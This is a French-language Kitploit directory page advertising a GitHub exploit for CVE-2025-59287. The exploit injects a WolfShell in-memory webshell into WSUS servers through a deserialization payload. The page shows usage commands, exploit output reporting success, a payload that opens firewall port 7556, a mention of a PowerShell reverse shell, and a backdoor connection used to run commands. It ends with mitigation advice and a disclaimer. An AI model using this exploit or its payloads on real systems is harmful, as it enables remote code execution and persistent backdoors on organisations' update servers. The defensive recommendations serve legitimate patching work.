Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0x7556/cve-2025-59287
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHub0x7556/cve-2025-59287

CVE-2025-59287

Exploit pour CVE-2025-59287, injectant une webshell mémoire WolfShell dans les serveurs WSUS pour obtenir une exécution de code à distance lorsque la console d'administration est ouverte.

Voir le dépôt
73il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Reproduction de la vulnérabilité CVE-2025-59287 WSUS

CVE-2025-59287 — Injection du cheval de Troie mémoire WolfShell Wolverine (positif)

Résumé

CVE-2025-59287 exploite un défaut logique dans les composants liés à WSUS pour injecter le cheval de Troie mémoire WolfShell dans le serveur cible. Lorsqu'un administrateur ouvre la console WSUS (déclenché par défaut dans un délai aléatoire de 1 à 30 minutes), le cheval de Troie mémoire se déclenche et provoque une exécution de code à distance (RCE). Ce document contient des exemples d'exploitation, les fichiers requis et des recommandations de protection.

Exemple d'utilisation

Utilisation

Envoyez un payload de désérialisation ysoserial.net au serveur cible, avec des fonctionnalités personnalisées. Ce projet démontre l'injection du cheval de Troie mémoire Wolverine.

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

Exemple d'injection du cheval WebShell ASPX Wolverine

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

Exemple d'injection du cheval mémoire WolfShell Wolverine (positif)

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

Exemple d'autorisation du port 7556 dans le pare-feu

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

Shell inversé PowerShell

win2019 Defender intercepte et bloque, inutilisable Defende

Ouvrir la console WSUS pour déclencher la vulnérabilité

Comme illustré, l'écoute réussie sur le port 7556 indique que le cheval de Troie mémoire Wolverine (positif) a été injecté. WolfDoor 1

Connexion Wolverine au cheval de Troie mémoire pour exécuter des commandes CMD

WolfDoor 2

Recommandations de protection

  • Appliquez immédiatement le correctif fourni par le fournisseur ou des mesures d'atténuation temporaires aux serveurs WSUS concernés.
  • Vérifiez et supprimez les clients suspects de WSUS (par exemple, hawktrace.local).
  • Limitez et auditez l'accès à la console d'administration WSUS afin de garantir que seuls les administrateurs de confiance y accèdent.
  • Utilisez des outils de détection d'intrusion, d'analyse mémoire et de surveillance de l'intégrité de l'hôte pour détecter les chevaux de Troie mémoire anormaux ou les modules suspects.
  • Avant l'application du correctif, évitez d'ouvrir la console WSUS ou de traiter des éléments de mise à jour suspects dans des environnements non fiables.

Avertissement

Ce document est uniquement destiné à la recherche en sécurité et à des fins de protection. N'utilisez pas le code d'exploitation associé sur des systèmes non autorisés ou pour des activités d'attaque.

Liens de référence

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

Télécharger l’outil